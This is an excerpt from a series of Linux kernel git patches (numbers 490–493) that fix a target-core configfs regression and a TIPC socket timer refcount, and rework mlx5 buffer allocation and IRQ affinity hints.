vlan_get_tag - get the VLAN ID from the skb * @skb: skbuff to query - * @vlan_tci: buffer to store vlaue + * @vlan_tci: buffer to store value * * Returns error if the skb is not VLAN tagged */ From d588cf8f618d7b316743a0bc99fede20f7a01bb7 Mon Sep 17 00:00:00 2001 From: Christoph Hellwig Date: Sun, 3 May 2015 08:50:52 +0200 Subject: [PATCH 490/872] target: Fix se_tpg_tfo->tf_subsys regression + remove tf_subsystem There is just one configfs subsystem in the target code, so we might as well add two helpers to reference / unreference it from the core code instead of passing pointers to it around. This fixes a regression introduced for v4.1-rc1 with commit 9ac8928e6, where configfs_depend_item() callers using se_tpg_tfo->tf_subsys would fail, because the assignment from the original target_core_subsystem[] is no longer happening at target_register_template() time. (Fix target_core_exit_configfs pointer dereference - Sagi) Signed-off-by: Christoph Hellwig Reported-by: Himanshu Madhani Signed-off-by: Nicholas Bellinger --- drivers/scsi/qla2xxx/tcm_qla2xxx.c | 6 ++--- drivers/target/target_core_configfs.c | 30 ++++++++++++------------- drivers/target/target_core_internal.h | 3 --- drivers/target/target_core_pr.c | 32 ++++++--------------------- drivers/target/target_core_xcopy.c | 15 +++++-------- drivers/vhost/scsi.c | 6 ++--- include/target/target_core_configfs.h | 2 -- include/target/target_core_fabric.h | 4 +++- 8 files changed, 34 insertions(+), 64 deletions(-) diff --git a/drivers/scsi/qla2xxx/tcm_qla2xxx.c b/drivers/scsi/qla2xxx/tcm_qla2xxx.c index 68c2002e78bf..5c9e680aa375 100644 --- a/drivers/scsi/qla2xxx/tcm_qla2xxx.c +++ b/drivers/scsi/qla2xxx/tcm_qla2xxx.c @@ -1020,8 +1020,7 @@ static void tcm_qla2xxx_depend_tpg(struct work_struct *work) struct se_portal_group *se_tpg = &base_tpg->se_tpg; struct scsi_qla_host *base_vha = base_tpg->lport->qla_vha; - if (!configfs_depend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item)) { + if (!target_depend_item(&se_tpg->tpg_group.cg_item)) { atomic_set(&base_tpg->lport_tpg_enabled, 1); qlt_enable_vha(base_vha); } @@ -1037,8 +1036,7 @@ static void tcm_qla2xxx_undepend_tpg(struct work_struct *work) if (!qlt_stop_phase1(base_vha->vha_tgt.qla_tgt)) { atomic_set(&base_tpg->lport_tpg_enabled, 0); - configfs_undepend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item); + target_undepend_item(&se_tpg->tpg_group.cg_item); } complete(&base_tpg->tpg_base_comp); } diff --git a/drivers/target/target_core_configfs.c b/drivers/target/target_core_configfs.c index ddaf76a4ac2a..1580077971f8 100644 --- a/drivers/target/target_core_configfs.c +++ b/drivers/target/target_core_configfs.c @@ -212,10 +212,6 @@ static struct config_group *target_core_register_fabric( pr_debug("Target_Core_ConfigFS: REGISTER -> Allocated Fabric:" " %s\n", tf->tf_group.cg_item.ci_name); - /* - * Setup tf_ops.tf_subsys pointer for usage with configfs_depend_item() - */ - tf->tf_ops.tf_subsys = tf->tf_subsys; tf->tf_fabric = &tf->tf_group.cg_item; pr_debug("Target_Core_ConfigFS: REGISTER -> Set tf->tf_fabric" " for %s\n", name); @@ -291,10 +287,17 @@ static struct configfs_subsystem target_core_fabrics = { }, }; -struct configfs_subsystem *target_core_subsystem[] = { - &target_core_fabrics, - NULL, -}; +int target_depend_item(struct config_item *item) +{ + return configfs_depend_item(&target_core_fabrics, item); +} +EXPORT_SYMBOL(target_depend_item); + +void target_undepend_item(struct config_item *item) +{ + return configfs_undepend_item(&target_core_fabrics, item); +} +EXPORT_SYMBOL(target_undepend_item); /*############################################################################## // Start functions called by external Target Fabrics Modules @@ -467,7 +470,6 @@ int target_register_template(const struct target_core_fabric_ops *fo) * struct target_fabric_configfs->tf_cit_tmpl */ tf->tf_module = fo->module; - tf->tf_subsys = target_core_subsystem[0]; snprintf(tf->tf_name, TARGET_FABRIC_NAME_SIZE, "%s", fo->name); tf->tf_ops = *fo; @@ -2870,7 +2872,7 @@ static int __init target_core_init_configfs(void) { struct config_group *target_cg, *hba_cg = NULL, *alua_cg = NULL; struct config_group *lu_gp_cg = NULL; - struct configfs_subsystem *subsys; + struct configfs_subsystem *subsys = &target_core_fabrics; struct t10_alua_lu_gp *lu_gp; int ret; @@ -2878,7 +2880,6 @@ static int __init target_core_init_configfs(void) " Engine: %s on %s/%s on "UTS_RELEASE"\n", TARGET_CORE_VERSION, utsname()->sysname, utsname()->machine); - subsys = target_core_subsystem[0]; config_group_init(&subsys->su_group); mutex_init(&subsys->su_mutex); @@ -3008,13 +3009,10 @@ static int __init target_core_init_configfs(void) static void __exit target_core_exit_configfs(void) { - struct configfs_subsystem *subsys; struct config_group *hba_cg, *alua_cg, *lu_gp_cg; struct config_item *item; int i; - subsys = target_core_subsystem[0]; - lu_gp_cg = &alua_lu_gps_group; for (i = 0; lu_gp_cg->default_groups[i]; i++) { item = &lu_gp_cg->default_groups[i]->cg_item; @@ -3045,8 +3043,8 @@ static void __exit target_core_exit_configfs(void) * We expect subsys->su_group.default_groups to be released * by configfs subsystem provider logic.. */ - configfs_unregister_subsystem(subsys); - kfree(subsys->su_group.default_groups); + configfs_unregister_subsystem(&target_core_fabrics); + kfree(target_core_fabrics.su_group.default_groups); core_alua_free_lu_gp(default_lu_gp); default_lu_gp = NULL; diff --git a/drivers/target/target_core_internal.h b/drivers/target/target_core_internal.h index 874a9bc988d8..68bd7f5d9f73 100644 --- a/drivers/target/target_core_internal.h +++ b/drivers/target/target_core_internal.h @@ -4,9 +4,6 @@ /* target_core_alua.c */ extern struct t10_alua_lu_gp *default_lu_gp; -/* target_core_configfs.c */ -extern struct configfs_subsystem *target_core_subsystem[]; - /* target_core_device.c */ extern struct mutex g_device_mutex; extern struct list_head g_device_list; diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c index c1aa9655e96e..b7c81acf08d0 100644 --- a/drivers/target/target_core_pr.c +++ b/drivers/target/target_core_pr.c @@ -1367,41 +1367,26 @@ void core_scsi3_free_all_registrations( static int core_scsi3_tpg_depend_item(struct se_portal_group *tpg) { - return configfs_depend_item(tpg->se_tpg_tfo->tf_subsys, - &tpg->tpg_group.cg_item); + return target_depend_item(&tpg->tpg_group.cg_item); } static void core_scsi3_tpg_undepend_item(struct se_portal_group *tpg) { - configfs_undepend_item(tpg->se_tpg_tfo->tf_subsys, - &tpg->tpg_group.cg_item); - + target_undepend_item(&tpg->tpg_group.cg_item); atomic_dec_mb(&tpg->tpg_pr_ref_count); } static int core_scsi3_nodeacl_depend_item(struct se_node_acl *nacl) { - struct se_portal_group *tpg = nacl->se_tpg; - if (nacl->dynamic_node_acl) return 0; - - return configfs_depend_item(tpg->se_tpg_tfo->tf_subsys, - &nacl->acl_group.cg_item); + return target_depend_item(&nacl->acl_group.cg_item); } static void core_scsi3_nodeacl_undepend_item(struct se_node_acl *nacl) { - struct se_portal_group *tpg = nacl->se_tpg; - - if (nacl->dynamic_node_acl) { - atomic_dec_mb(&nacl->acl_pr_ref_count); - return; - } - - configfs_undepend_item(tpg->se_tpg_tfo->tf_subsys, - &nacl->acl_group.cg_item); - + if (!nacl->dynamic_node_acl) + target_undepend_item(&nacl->acl_group.cg_item); atomic_dec_mb(&nacl->acl_pr_ref_count); } @@ -1419,8 +1404,7 @@ static int core_scsi3_lunacl_depend_item(struct se_dev_entry *se_deve) nacl = lun_acl->se_lun_nacl; tpg = nacl->se_tpg; - return configfs_depend_item(tpg->se_tpg_tfo->tf_subsys, - &lun_acl->se_lun_group.cg_item); + return target_depend_item(&lun_acl->se_lun_group.cg_item); } static void core_scsi3_lunacl_undepend_item(struct se_dev_entry *se_deve) @@ -1438,9 +1422,7 @@ static void core_scsi3_lunacl_undepend_item(struct se_dev_entry *se_deve) nacl = lun_acl->se_lun_nacl; tpg = nacl->se_tpg; - configfs_undepend_item(tpg->se_tpg_tfo->tf_subsys, - &lun_acl->se_lun_group.cg_item); - + target_undepend_item(&lun_acl->se_lun_group.cg_item); atomic_dec_mb(&se_deve->pr_ref_count); } diff --git a/drivers/target/target_core_xcopy.c b/drivers/target/target_core_xcopy.c index a600ff15dcfd..8fd680ac941b 100644 --- a/drivers/target/target_core_xcopy.c +++ b/drivers/target/target_core_xcopy.c @@ -58,7 +58,6 @@ static int target_xcopy_locate_se_dev_e4(struct se_cmd *se_cmd, struct xcopy_op bool src) { struct se_device *se_dev; - struct configfs_subsystem *subsys = target_core_subsystem[0]; unsigned char tmp_dev_wwn[XCOPY_NAA_IEEE_REGEX_LEN], *dev_wwn; int rc; @@ -90,8 +89,7 @@ static int target_xcopy_locate_se_dev_e4(struct se_cmd *se_cmd, struct xcopy_op " se_dev\n", xop->src_dev); } - rc = configfs_depend_item(subsys, - &se_dev->dev_group.cg_item); + rc = target_depend_item(&se_dev->dev_group.cg_item); if (rc != 0) { pr_err("configfs_depend_item attempt failed:" " %d for se_dev: %p\n", rc, se_dev); @@ -99,8 +97,8 @@ static int target_xcopy_locate_se_dev_e4(struct se_cmd *se_cmd, struct xcopy_op return rc; } - pr_debug("Called configfs_depend_item for subsys: %p se_dev: %p" - " se_dev->se_dev_group: %p\n", subsys, se_dev, + pr_debug("Called configfs_depend_item for se_dev: %p" + " se_dev->se_dev_group: %p\n", se_dev, &se_dev->dev_group); mutex_unlock(&g_device_mutex); @@ -373,7 +371,6 @@ static int xcopy_pt_get_cmd_state(struct se_cmd *se_cmd) static void xcopy_pt_undepend_remotedev(struct xcopy_op *xop) { - struct configfs_subsystem *subsys = target_core_subsystem[0]; struct se_device *remote_dev; if (xop->op_origin == XCOL_SOURCE_RECV_OP) @@ -381,11 +378,11 @@ static void xcopy_pt_undepend_remotedev(struct xcopy_op *xop) else remote_dev = xop->src_dev; - pr_debug("Calling configfs_undepend_item for subsys: %p" + pr_debug("Calling configfs_undepend_item for" " remote_dev: %p remote_dev->dev_group: %p\n", - subsys, remote_dev, &remote_dev->dev_group.cg_item); + remote_dev, &remote_dev->dev_group.cg_item); - configfs_undepend_item(subsys, &remote_dev->dev_group.cg_item); + target_undepend_item(&remote_dev->dev_group.cg_item); } static void xcopy_pt_release_cmd(struct se_cmd *se_cmd) diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c index 5e19bb53b3a9..ea32b386797f 100644 --- a/drivers/vhost/scsi.c +++ b/drivers/vhost/scsi.c @@ -1409,8 +1409,7 @@ vhost_scsi_set_endpoint(struct vhost_scsi *vs, * dependency now. */ se_tpg = &tpg->se_tpg; - ret = configfs_depend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item); + ret = target_depend_item(&se_tpg->tpg_group.cg_item); if (ret) { pr_warn("configfs_depend_item() failed: %d\n", ret); kfree(vs_tpg); @@ -1513,8 +1512,7 @@ vhost_scsi_clear_endpoint(struct vhost_scsi *vs, * to allow vhost-scsi WWPN se_tpg->tpg_group shutdown to occur. */ se_tpg = &tpg->se_tpg; - configfs_undepend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item); + target_undepend_item(&se_tpg->tpg_group.cg_item); } if (match) { for (i = 0; i < VHOST_SCSI_MAX_VQ; i++) { diff --git a/include/target/target_core_configfs.h b/include/target/target_core_configfs.h index 25bb04c4209e..b99c01170392 100644 --- a/include/target/target_core_configfs.h +++ b/include/target/target_core_configfs.h @@ -40,8 +40,6 @@ struct target_fabric_configfs { struct config_item *tf_fabric; /* Passed from fabric modules */ struct config_item_type *tf_fabric_cit; - /* Pointer to target core subsystem */ - struct configfs_subsystem *tf_subsys; /* Pointer to fabric's struct module */ struct module *tf_module; struct target_core_fabric_ops tf_ops; diff --git a/include/target/target_core_fabric.h b/include/target/target_core_fabric.h index 17c7f5ac7ea0..0f4dc3768587 100644 --- a/include/target/target_core_fabric.h +++ b/include/target/target_core_fabric.h @@ -4,7 +4,6 @@ struct target_core_fabric_ops { struct module *module; const char *name; - struct configfs_subsystem *tf_subsys; char *(*get_fabric_name)(void); u8 (*get_fabric_proto_ident)(struct se_portal_group *); char *(*tpg_get_wwn)(struct se_portal_group *); @@ -109,6 +108,9 @@ struct target_core_fabric_ops { int target_register_template(const struct target_core_fabric_ops *fo); void target_unregister_template(const struct target_core_fabric_ops *fo); +int target_depend_item(struct config_item *item); +void target_undepend_item(struct config_item *item); + struct se_session *transport_init_session(enum target_prot_op); int transport_alloc_session_tags(struct se_session *, unsigned int, unsigned int); From 1ea23a21176e449685a9d0523ab6da83e3779eb1 Mon Sep 17 00:00:00 2001 From: Ying Xue Date: Thu, 28 May 2015 13:19:22 +0800 Subject: [PATCH 491/872] tipc: unconditionally put sock refcnt when sock timer to be deleted is pending As sock refcnt is taken when sock timer is started in sk_reset_timer(), the sock refcnt should be put when sock timer to be deleted is in pending state no matter what "probing_state" value of tipc sock is. Reviewed-by: Erik Hugne Reviewed-by: Jon Maloy Signed-off-by: Ying Xue Signed-off-by: David S. Miller --- net/tipc/socket.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/net/tipc/socket.c b/net/tipc/socket.c index 9370f953e16f..30ea82a9b0f1 100644 --- a/net/tipc/socket.c +++ b/net/tipc/socket.c @@ -410,7 +410,7 @@ static int tipc_release(struct socket *sock) struct net *net; struct tipc_sock *tsk; struct sk_buff *skb; - u32 dnode, probing_state; + u32 dnode; /* * Exit if socket isn't fully initialized (occurs when a failed accept() @@ -448,10 +448,7 @@ static int tipc_release(struct socket *sock) } tipc_sk_withdraw(tsk, 0, NULL); - probing_state = tsk->probing_state; - if (del_timer_sync(&sk->sk_timer) && - probing_state != TIPC_CONN_PROBING) - sock_put(sk); + sk_stop_timer(sk, &sk->sk_timer); tipc_sk_remove(tsk); if (tsk->connected) { skb = tipc_msg_create(TIPC_CRITICAL_IMPORTANCE, From 64ffaa2159b752e6c263dc57eaaaed7367d37493 Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:38 +0300 Subject: [PATCH 492/872] net/mlx5_core,mlx5_ib: Do not use vmap() on coherent memory As David Daney pointed in mlx4_core driver [1], mlx5_core is also misusing the DMA-API. This patch is removing the code that vmap() memory allocated by dma_alloc_coherent(). After this patch, users of this drivers might fail allocating resources on memory fragmeneted systems. This will be fixed later on. [1] - https://patchwork.ozlabs.org/patch/458531/ CC: David Daney Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/cq.c | 3 +- drivers/infiniband/hw/mlx5/qp.c | 2 +- drivers/infiniband/hw/mlx5/srq.c | 2 +- .../net/ethernet/mellanox/mlx5/core/alloc.c | 96 ++++--------------- drivers/net/ethernet/mellanox/mlx5/core/eq.c | 3 +- include/linux/mlx5/driver.h | 9 +- 6 files changed, 22 insertions(+), 93 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/cq.c b/drivers/infiniband/hw/mlx5/cq.c index 2ee6b1051975..4e88b18cf62e 100644 --- a/drivers/infiniband/hw/mlx5/cq.c +++ b/drivers/infiniband/hw/mlx5/cq.c @@ -590,8 +590,7 @@ static int alloc_cq_buf(struct mlx5_ib_dev *dev, struct mlx5_ib_cq_buf *buf, { int err; - err = mlx5_buf_alloc(dev->mdev, nent * cqe_size, - PAGE_SIZE * 2, &buf->buf); + err = mlx5_buf_alloc(dev->mdev, nent * cqe_size, &buf->buf); if (err) return err; diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c index d35f62d4f4c5..426eb88dfa49 100644 --- a/drivers/infiniband/hw/mlx5/qp.c +++ b/drivers/infiniband/hw/mlx5/qp.c @@ -768,7 +768,7 @@ static int create_kernel_qp(struct mlx5_ib_dev *dev, qp->sq.offset = qp->rq.wqe_cnt << qp->rq.wqe_shift; qp->buf_size = err + (qp->rq.wqe_cnt << qp->rq.wqe_shift); - err = mlx5_buf_alloc(dev->mdev, qp->buf_size, PAGE_SIZE * 2, &qp->buf); + err = mlx5_buf_alloc(dev->mdev, qp->buf_size, &qp->buf); if (err) { mlx5_ib_dbg(dev, "err %d\n", err); goto err_uuar; diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c index 02d77a29764d..4242e1ded868 100644 --- a/drivers/infiniband/hw/mlx5/srq.c +++ b/drivers/infiniband/hw/mlx5/srq.c @@ -165,7 +165,7 @@ static int create_srq_kernel(struct mlx5_ib_dev *dev, struct mlx5_ib_srq *srq, return err; } - if (mlx5_buf_alloc(dev->mdev, buf_size, PAGE_SIZE * 2, &srq->buf)) { + if (mlx5_buf_alloc(dev->mdev, buf_size, &srq->buf)) { mlx5_ib_dbg(dev, "buf alloc failed\n"); err = -ENOMEM; goto err_db; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/alloc.c b/drivers/net/ethernet/mellanox/mlx5/core/alloc.c index ac0f7bf4be95..0715b497511f 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/alloc.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/alloc.c @@ -42,95 +42,36 @@ #include "mlx5_core.h" /* Handling for queue buffers -- we allocate a bunch of memory and - * register it in a memory region at HCA virtual address 0. If the - * requested size is > max_direct, we split the allocation into - * multiple pages, so we don't require too much contiguous memory. + * register it in a memory region at HCA virtual address 0. */ -int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, int max_direct, - struct mlx5_buf *buf) +int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, struct mlx5_buf *buf) { dma_addr_t t; buf->size = size; - if (size <= max_direct) { - buf->nbufs = 1; - buf->npages = 1; - buf->page_shift = (u8)get_order(size) + PAGE_SHIFT; - buf->direct.buf = dma_zalloc_coherent(&dev->pdev->dev, - size, &t, GFP_KERNEL); - if (!buf->direct.buf) - return -ENOMEM; - - buf->direct.map = t; - - while (t & ((1 << buf->page_shift) - 1)) { - --buf->page_shift; - buf->npages *= 2; - } - } else { - int i; - - buf->direct.buf = NULL; - buf->nbufs = (size + PAGE_SIZE - 1) / PAGE_SIZE; - buf->npages = buf->nbufs; - buf->page_shift = PAGE_SHIFT; - buf->page_list = kcalloc(buf->nbufs, sizeof(*buf->page_list), - GFP_KERNEL); - if (!buf->page_list) - return -ENOMEM; - - for (i = 0; i < buf->nbufs; i++) { - buf->page_list[i].buf = - dma_zalloc_coherent(&dev->pdev->dev, PAGE_SIZE, - &t, GFP_KERNEL); - if (!buf->page_list[i].buf) - goto err_free; - - buf->page_list[i].map = t; - } - - if (BITS_PER_LONG == 64) { - struct page **pages; - pages = kmalloc(sizeof(*pages) * buf->nbufs, GFP_KERNEL); - if (!pages) - goto err_free; - for (i = 0; i < buf->nbufs; i++) - pages[i] = virt_to_page(buf->page_list[i].buf); - buf->direct.buf = vmap(pages, buf->nbufs, VM_MAP, PAGE_KERNEL); - kfree(pages); - if (!buf->direct.buf) - goto err_free; - } - } + buf->npages = 1; + buf->page_shift = (u8)get_order(size) + PAGE_SHIFT; + buf->direct.buf = dma_zalloc_coherent(&dev->pdev->dev, + size, &t, GFP_KERNEL); + if (!buf->direct.buf) + return -ENOMEM; - return 0; + buf->direct.map = t; -err_free: - mlx5_buf_free(dev, buf); + while (t & ((1 << buf->page_shift) - 1)) { + --buf->page_shift; + buf->npages *= 2; + } - return -ENOMEM; + return 0; } EXPORT_SYMBOL_GPL(mlx5_buf_alloc); void mlx5_buf_free(struct mlx5_core_dev *dev, struct mlx5_buf *buf) { - int i; - - if (buf->nbufs == 1) - dma_free_coherent(&dev->pdev->dev, buf->size, buf->direct.buf, - buf->direct.map); - else { - if (BITS_PER_LONG == 64) - vunmap(buf->direct.buf); - - for (i = 0; i < buf->nbufs; i++) - if (buf->page_list[i].buf) - dma_free_coherent(&dev->pdev->dev, PAGE_SIZE, - buf->page_list[i].buf, - buf->page_list[i].map); - kfree(buf->page_list); - } + dma_free_coherent(&dev->pdev->dev, buf->size, buf->direct.buf, + buf->direct.map); } EXPORT_SYMBOL_GPL(mlx5_buf_free); @@ -230,10 +171,7 @@ void mlx5_fill_page_array(struct mlx5_buf *buf, __be64 *pas) int i; for (i = 0; i < buf->npages; i++) { - if (buf->nbufs == 1) - addr = buf->direct.map + (i << buf->page_shift); - else - addr = buf->page_list[i].map; + addr = buf->direct.map + (i << buf->page_shift); pas[i] = cpu_to_be64(addr); } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c index 58800e4f3958..3f511bd84489 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c @@ -346,8 +346,7 @@ int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, int inlen; eq->nent = roundup_pow_of_two(nent + MLX5_NUM_SPARE_EQE); - err = mlx5_buf_alloc(dev, eq->nent * MLX5_EQE_SIZE, 2 * PAGE_SIZE, - &eq->buf); + err = mlx5_buf_alloc(dev, eq->nent * MLX5_EQE_SIZE, &eq->buf); if (err) return err; diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 9a90e7523dc2..c4cf25ffcc16 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -334,8 +334,6 @@ struct mlx5_buf_list { struct mlx5_buf { struct mlx5_buf_list direct; - struct mlx5_buf_list *page_list; - int nbufs; int npages; int size; u8 page_shift; @@ -586,11 +584,7 @@ struct mlx5_pas { static inline void *mlx5_buf_offset(struct mlx5_buf *buf, int offset) { - if (likely(BITS_PER_LONG == 64 || buf->nbufs == 1)) return buf->direct.buf + offset; - else - return buf->page_list[offset >> PAGE_SHIFT].buf + - (offset & (PAGE_SIZE - 1)); } extern struct workqueue_struct *mlx5_core_wq; @@ -669,8 +663,7 @@ void mlx5_health_cleanup(void); void __init mlx5_health_init(void); void mlx5_start_health_poll(struct mlx5_core_dev *dev); void mlx5_stop_health_poll(struct mlx5_core_dev *dev); -int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, int max_direct, - struct mlx5_buf *buf); +int mlx5_buf_alloc(struct mlx5_core_dev *dev, int size, struct mlx5_buf *buf); void mlx5_buf_free(struct mlx5_core_dev *dev, struct mlx5_buf *buf); struct mlx5_cmd_mailbox *mlx5_alloc_cmd_mailbox_chain(struct mlx5_core_dev *dev, gfp_t flags, int npages); From db058a186f98b057c19c42f7b10d9a96fd3b5d59 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:39 +0300 Subject: [PATCH 493/872] net/mlx5_core: Set irq affinity hints Preparation for upcoming ethernet driver. - Move msix array from eq_table struct to priv since its not related to eq_table - Intorduce irq_info struct to hold all irq information - Move name from mlx5_eq to irq_info struct since it is irq property. - Set IRQ affinity hints Signed-off-by: Achiad Shochat Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/eq.c | 16 +-- .../net/ethernet/mellanox/mlx5/core/main.c | 111 ++++++++++++++++-- include/linux/mlx5/driver.h | 11 +- 3 files changed, 117 insertions(+), 21 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c index 3f511bd84489..516efc25fc4f 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c @@ -339,7 +339,7 @@ static void init_eq_buf(struct mlx5_eq *eq) int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, int nent, u64 mask, const char *name, struct mlx5_uar *uar) { - struct mlx5_eq_table *table = &dev->priv.eq_table; + struct mlx5_priv *priv = &dev->priv; struct mlx5_create_eq_mbox_in *in; struct mlx5_create_eq_mbox_out out; int err; @@ -377,14 +377,15 @@ int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, goto err_in; } - snprintf(eq->name, MLX5_MAX_EQ_NAME, "%s@pci:%s", + snprintf(priv->irq_info[vecidx].name, MLX5_MAX_IRQ_NAME, "%s@pci:%s", name, pci_name(dev->pdev)); + eq->eqn = out.eq_number; eq->irqn = vecidx; eq->dev = dev; eq->doorbell = uar->map + MLX5_EQ_DOORBEL_OFFSET; - err = request_irq(table->msix_arr[vecidx].vector, mlx5_msix_handler, 0, - eq->name, eq); + err = request_irq(priv->msix_arr[vecidx].vector, mlx5_msix_handler, 0, + priv->irq_info[vecidx].name, eq); if (err) goto err_eq; @@ -400,7 +401,7 @@ int mlx5_create_map_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq, u8 vecidx, return 0; err_irq: - free_irq(table->msix_arr[vecidx].vector, eq); + free_irq(priv->msix_arr[vecidx].vector, eq); err_eq: mlx5_cmd_destroy_eq(dev, eq->eqn); @@ -416,16 +417,15 @@ EXPORT_SYMBOL_GPL(mlx5_create_map_eq); int mlx5_destroy_unmap_eq(struct mlx5_core_dev *dev, struct mlx5_eq *eq) { - struct mlx5_eq_table *table = &dev->priv.eq_table; int err; mlx5_debug_eq_remove(dev, eq); - free_irq(table->msix_arr[eq->irqn].vector, eq); + free_irq(dev->priv.msix_arr[eq->irqn].vector, eq); err = mlx5_cmd_destroy_eq(dev, eq->eqn); if (err) mlx5_core_warn(dev, "failed to destroy a previously created eq: eqn %d\n", eq->eqn); - synchronize_irq(table->msix_arr[eq->irqn].vector); + synchronize_irq(dev->priv.msix_arr[eq->irqn].vector); mlx5_buf_free(dev, &eq->buf); return err; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 28425e5ea91f..55085b01b4ce 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -38,6 +38,7 @@ #include #include #include +#include #include #include #include @@ -208,7 +209,8 @@ static void release_bar(struct pci_dev *pdev) static int mlx5_enable_msix(struct mlx5_core_dev *dev) { - struct mlx5_eq_table *table = &dev->priv.eq_table; + struct mlx5_priv *priv = &dev->priv; + struct mlx5_eq_table *table = &priv->eq_table; int num_eqs = 1 << dev->caps.gen.log_max_eq; int nvec; int i; @@ -218,14 +220,16 @@ static int mlx5_enable_msix(struct mlx5_core_dev *dev) if (nvec <= MLX5_EQ_VEC_COMP_BASE) return -ENOMEM; - table->msix_arr = kzalloc(nvec * sizeof(*table->msix_arr), GFP_KERNEL); - if (!table->msix_arr) - return -ENOMEM; + priv->msix_arr = kcalloc(nvec, sizeof(*priv->msix_arr), GFP_KERNEL); + + priv->irq_info = kcalloc(nvec, sizeof(*priv->irq_info), GFP_KERNEL); + if (!priv->msix_arr || !priv->irq_info) + goto err_free_msix; for (i = 0; i < nvec; i++) - table->msix_arr[i].entry = i; + priv->msix_arr[i].entry = i; - nvec = pci_enable_msix_range(dev->pdev, table->msix_arr, + nvec = pci_enable_msix_range(dev->pdev, priv->msix_arr, MLX5_EQ_VEC_COMP_BASE + 1, nvec); if (nvec < 0) return nvec; @@ -233,14 +237,20 @@ static int mlx5_enable_msix(struct mlx5_core_dev *dev) table->num_comp_vectors = nvec - MLX5_EQ_VEC_COMP_BASE; return 0; + +err_free_msix: + kfree(priv->irq_info); + kfree(priv->msix_arr); + return -ENOMEM; } static void mlx5_disable_msix(struct mlx5_core_dev *dev) { - struct mlx5_eq_table *table = &dev->priv.eq_table; + struct mlx5_priv *priv = &dev->priv; pci_disable_msix(dev->pdev); - kfree(table->msix_arr); + kfree(priv->irq_info); + kfree(priv->msix_arr); } struct mlx5_reg_host_endianess { @@ -507,6 +517,77 @@ static int mlx5_core_disable_hca(struct mlx5_core_dev *dev) return 0; } +static int mlx5_irq_set_affinity_hint(struct mlx5_core_dev *mdev, int i) +{ + struct mlx5_priv *priv = &mdev->priv; + struct msix_entry *msix = priv->msix_arr; + int irq = msix[i + MLX5_EQ_VEC_COMP_BASE].vector; + int numa_node = dev_to_node(&mdev->pdev->dev); + int err; + + if (!zalloc_cpumask_var(&priv->irq_info[i].mask, GFP_KERNEL)) { + mlx5_core_warn(mdev, "zalloc_cpumask_var failed"); + return -ENOMEM; + } + + err = cpumask_set_cpu_local_first(i, numa_node, priv->irq_info[i].mask); + if (err) { + mlx5_core_warn(mdev, "cpumask_set_cpu_local_first failed"); + goto err_clear_mask; + } + + err = irq_set_affinity_hint(irq, priv->irq_info[i].mask); + if (err) { + mlx5_core_warn(mdev, "irq_set_affinity_hint failed,irq 0x%.4x", + irq); + goto err_clear_mask; + } + + return 0; + +err_clear_mask: + free_cpumask_var(priv->irq_info[i].mask); + return err; +} + +static void mlx5_irq_clear_affinity_hint(struct mlx5_core_dev *mdev, int i) +{ + struct mlx5_priv *priv = &mdev->priv; + struct msix_entry *msix = priv->msix_arr; + int irq = msix[i + MLX5_EQ_VEC_COMP_BASE].vector; + + irq_set_affinity_hint(irq, NULL); + free_cpumask_var(priv->irq_info[i].mask); +} + +static int mlx5_irq_set_affinity_hints(struct mlx5_core_dev *mdev) +{ + int err; + int i; + + for (i = 0; i < mdev->priv.eq_table.num_comp_vectors; i++) { + err = mlx5_irq_set_affinity_hint(mdev, i); + if (err) + goto err_out; + } + + return 0; + +err_out: + for (i--; i >= 0; i--) + mlx5_irq_clear_affinity_hint(mdev, i); + + return err; +} + +static void mlx5_irq_clear_affinity_hints(struct mlx5_core_dev *mdev) +{ + int i; + + for (i = 0; i < mdev->priv.eq_table.num_comp_vectors; i++) + mlx5_irq_clear_affinity_hint(mdev, i); +} + int mlx5_vector2eqn(struct mlx5_core_dev *dev, int vector, int *eqn, int *irqn) { struct mlx5_eq_table *table = 